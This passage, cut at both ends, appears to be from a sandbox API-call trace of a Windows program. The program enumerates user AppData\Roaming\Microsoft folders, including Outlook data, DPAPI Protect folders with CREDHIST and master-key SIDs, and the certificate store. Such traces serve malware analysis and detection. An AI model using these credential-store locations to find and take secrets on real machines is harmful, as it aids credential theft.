lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Excel", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Excel", lpFilePart=0x0) returned 0x32 [0221.529] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Excel\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.530] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.530] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSTART", cAlternateFileName="")) returned 1 [0221.530] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSTART", cAlternateFileName="")) returned 0 [0221.530] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.530] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpFilePart=0x0) returned 0x3e [0221.530] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.531] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpFilePart=0x0) returned 0x3e [0221.531] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795fff90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.531] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795fff90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.531] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d24b360, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0221.531] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d24b360, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 0 [0221.532] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.532] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.532] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.532] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network", lpFilePart=0x0) returned 0x34 [0221.532] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.532] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network", lpFilePart=0x0) returned 0x34 [0221.532] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.533] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.533] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0221.533] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 0 [0221.533] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.534] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office", lpFilePart=0x0) returned 0x33 [0221.534] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.534] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office", lpFilePart=0x0) returned 0x33 [0221.534] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28666ef0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b32ecd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b32ecd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.536] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28666ef0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b32ecd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b32ecd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.536] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2868d050, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2868d050, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2868d050, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x9362, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSO1033.acl", cAlternateFileName="")) returned 1 [0221.536] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2b32ecd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b413510, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b413510, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0221.536] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2b32ecd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b413510, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b413510, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 0 [0221.537] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.537] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook", lpFilePart=0x0) returned 0x34 [0221.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.537] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook", lpFilePart=0x0) returned 0x34 [0221.537] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x500531d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x5b267fb0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.538] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x500531d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x5b267fb0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.538] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53aa4cd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x53aa4cd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3a502870, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.srs", cAlternateFileName="")) returned 1 [0221.538] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5b267fb0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3a907d30, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x93e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.xml", cAlternateFileName="")) returned 1 [0221.538] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0221.538] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.538] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Proof", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Proof", lpFilePart=0x0) returned 0x32 [0221.539] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.539] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Proof", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Proof", lpFilePart=0x0) returned 0x32 [0221.539] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Proof\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42694660, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x42694660, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x42694660, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.540] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42694660, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x42694660, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x42694660, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.540] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42694660, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x42694660, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x42694660, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0221.541] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.541] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Protect", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Protect", lpFilePart=0x0) returned 0x34 [0221.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.541] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Protect", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Protect", lpFilePart=0x0) returned 0x34 [0221.541] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x30b088f0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x30b088f0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.541] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x30b088f0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x30b088f0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.541] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x79a044b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a044b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x47b8e1c0, ftLastWriteTime.dwHighDateTime=0x1d7a944, nFileSizeHigh=0x0, nFileSizeLow=0x1c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0221.542] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3111613574-2524581245-2586426736-500", cAlternateFileName="S-1-5-~1")) returned 1 [0221.542] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x30b088f0, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x510a9850, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x510a9850, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-4219442223-4223814209-3835049652-1000", cAlternateFileName="S-1-5-~2")) returned 1 [0221.542] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7bba3b70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7bba3b70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x47bf4a60, ftLastWriteTime.dwHighDateTime=0x1d7a944, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SYNCHIST", cAlternateFileName="")) returned 1 [0221.542] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0221.542] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.542] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\SystemCertificates", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\SystemCertificates", lpFilePart=0x0) returned 0x3f [0221.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.542] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\SystemCertificates", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\SystemCertificates", lpFilePart=0x0) returned 0x3f [0221.543] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.543] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.543] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 1 [0221.543] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: 